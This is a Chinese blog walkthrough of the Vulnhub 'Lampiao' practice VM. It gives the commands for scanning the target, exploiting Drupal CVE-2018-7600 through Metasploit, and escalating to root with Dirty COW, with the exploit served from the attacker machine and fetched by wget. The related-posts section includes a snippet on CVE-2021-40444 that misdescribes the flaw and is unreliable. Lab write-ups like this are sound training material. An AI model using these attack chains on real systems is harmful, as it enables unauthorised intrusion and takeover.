Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现

已于 2022-09-28 09:45:57 修改
阅读量3.9k 收藏 16
点赞数 8
文章标签: 安全 web安全 linux
于 2022-09-27 16:19:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/travi4cott/article/details/127056345
版权

准备阶段

Kali版本:2022.3

目标主机ip:192.168.186.148

攻击机ip:192.168.186.147

vulnhub和vulhub不同,无需安装环境。

lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249


下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式

登陆界面如下,此时账户密码未知,需要我们去找啦

复现过程:

1、使用nmap命令对网段进行扫描,以确定lampiao靶机具体的ip地址。

ssh:远程连接

nmap -sS -Pn 192.168.186.0/24
//-sS SYN扫描,使用最频繁,安全、快
//-Pn 目标机禁用ping,绕过ping扫描

2、分别访问22端口(无法访问)和80端口(如图)

3、具体扫描一下该ip所有端口号,有新发现,访问该端口

nmap 192.168.186.148 -p1-65535

 思路一:

1)点击两个“read more”,分别显示?q=node/1和?q=node/3。

 

2)唯独没有?q=node/2,试着访问一下,显示有两个文件

3)访问qrc.png,这里我用了离线识别二维码的小工具,大家也可以用微信扫描。

 

 4)没什么有用信息,所以我们去听音频。得到user:tiago

思路二:

1)通过dirsearch对该端口进行目录扫描,得到以下文件

dirsearch -u http://192.168.186.148:1898  #-u 指定网址

 2)访问CHANGE.txt文件,发现cms框架信息为Drupal 7.54

 3)百度看到有CVE-2018-7600远程代码执行漏洞

 4)使用msf,查找CVE-2018-7600漏洞

msfconsole
search CVE-2018-7600

 

 5)选中该漏洞,并设置好目标

use 0
show options #可以查到当前配置信息,需要配置目标主机的ip地址和端口
set rhosts 192.168.186.148 #设置目标地址
set rport 1898 #设置端口
show options

 

 6)运行,可以输入命令测试

run
shell #转换为有回显的shell

 7)查看所有文件,但是无法访问root文件夹,此时需要提升权限。

ls -al #列出所有文件,包括隐藏文件

cd root

脏牛提权:

1、通过searchsploit工具找到提权脚本,定位40847.cpp,下载到/tmp目录

searchsploit dirty
locate linux/local/40847.cpp #定位40847.cpp的位置
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp #将40847.cpp复制到/tmp目录下

2、首先进入tmp目录,然后开启http服务,选用8080端口

python -m http.server 8080

 3、在目标主机下载40847.cpp文件,并进行编译成40847可执行文件

wget http://192.168.186.147:8080/40847.cpp

 4、执行该文件,可以得到root用户对应的密码!!

./40847

 5、去lampiao靶机登录,用户名root,密码dirtyCowFun,去查看所有文件,成功找到flag~

ls -al
cat flag.txt

 参考的大佬博客链接:

vulnhub--lampiao(脏牛提权)_鲨鱼辣椒k的博客-CSDN博客_脏牛提权

Lampiao_无人问津的椰子的博客-CSDN博客

完结撒花*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。~!

又肝了好几个小时,遇到了很多问题,记录的过程对脏牛提权有了更加深入和清晰的认识啦~

希望能帮助到和我一样是小白的同学们捏~( ̄▽ ̄)~*

牛奶栗
关注
  • 8
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
脏牛提权(靶机复现
tubug的博客
03-26 1356
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
PROUMB_ios安卓 testlight proumb.cow/apps/android开发包安装ggzy.jianxi
热门推荐
app91的博客
05-12 20万+
PROUMB_ios安卓 testlight proumb.cow/apps/android开发包安装ggzy.jianxi require.context() 场景:如页面需要导入多个组件,原始写法: import titleCom from '@/components/home/titleCom' import bannerCom from '@/components/home/bannerCom' import cellCom from '@/components/home/cellCom' com
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2291
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel < 5.16.11 / 5.15.25 / 5.10.102中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权
人间体佐菲的博客
08-30 1675
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权
No.2-VulnHub-Lampiao渗透学习
meng_mo_jue_ying的博客
03-21 4130
VulnHub-Lampiao渗透学习 一、前言 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 难度:简单 目标:获取root权限,并获取到flag 二、信息收集 1.获取攻击目标 使用nmap或者netdiscover扫描网段信息,获取攻击目标 # nmap扫描网段 nmap -sP 192.168.88.0/24 # netdiscover扫描网段 netdiscover -r 192.168.88.0/24 扫描到攻击目标:192.168.88
[VulnHub靶机]Lampiao_脏牛提权
qq_45927819的博客
03-16 3400
环境介绍 攻击机:kali(192.168.56.104) 受害机:lampiao(192.168.56.107) 实验步骤 1. 扫描端口 nmap -sS -Pn -A -p- -n 192.168.56.107 开放了22、80、1898端口 2. 信息收集 80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录: 这些文件等会再看,1898端口: 经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通. 查看博客的详情页面: 下图是第一篇: 第二篇:
靶机Lampiao脏牛提权
m0_52754338的博客
10-02 1479
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
Linux权限提升—内核、SUID、脏牛提权
剁椒鱼头没剁椒的博客
04-02 2828
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞
vulnhub--lampiao脏牛提权
鲨鱼辣椒的博客
08-03 4411
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Linux脏牛(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 1548
对CVE-2016-5159提权的保姆级的教程
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
linux-headers-5.10.0-kali7-amd64_5.10.28-1kali1_amd64.deb
07-25
kali安装后,安装虚拟机tools需要的linux头文件
kali-linux-2023.3-vmware-amd64.part1.rar
最新发布
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
渗透项目(二):Lampiao
Ays.Ie的博客
10-16 1137
2022.10.16更新第二个渗透项目Lampiao,步骤很详细,继续努力!
Lampiao靶机渗透
ZK_1874的博客
03-24 418
Lampiao靶机渗透
零基础渗透测试全程记录(打靶)——Lampiao
ran的博客
07-28 1365
权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。在上面扫描出的ip地址中,.1、.2、.254、.138都是其它的一些ip地址,所以在此确认要进行攻击的靶机的ip地址为:192.168.190.140。比如平常挖洞使用fofa,天眼查,ip域名等进行查,在我们这个靶场中比如信息收集包括查看源码,使用工具dirb等。
Linux提权脏牛漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 1431
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
cve-2021-40444漏洞kali复现
04-06
由于cve-2021-40444漏洞的严重性,建议仅在合法授权的测试环境中进行复现和测试,不要在生产环境中尝试。 以下是在Kali Linux复现cve-2021-40444漏洞的步骤: 1. 安装 OpenOffice 打开终端并输入以下命令: ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档 使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档,并将以下内容复制并粘贴到文档中: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe,它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档 在终端中,输入以下命令以打开恶意文档: ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。 可以在终端中使用以下命令测试是否可以读取/etc/passwd文件: ``` cat /tmp/dump ``` 如果成功,将输出/etc/passwd文件的内容。 4. 修复漏洞 为了防止cve-2021-40444漏洞的利用,建议升级OpenOffice或LibreOffice到最新版本,或者禁用OpenOffice的自动加载外部实体功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值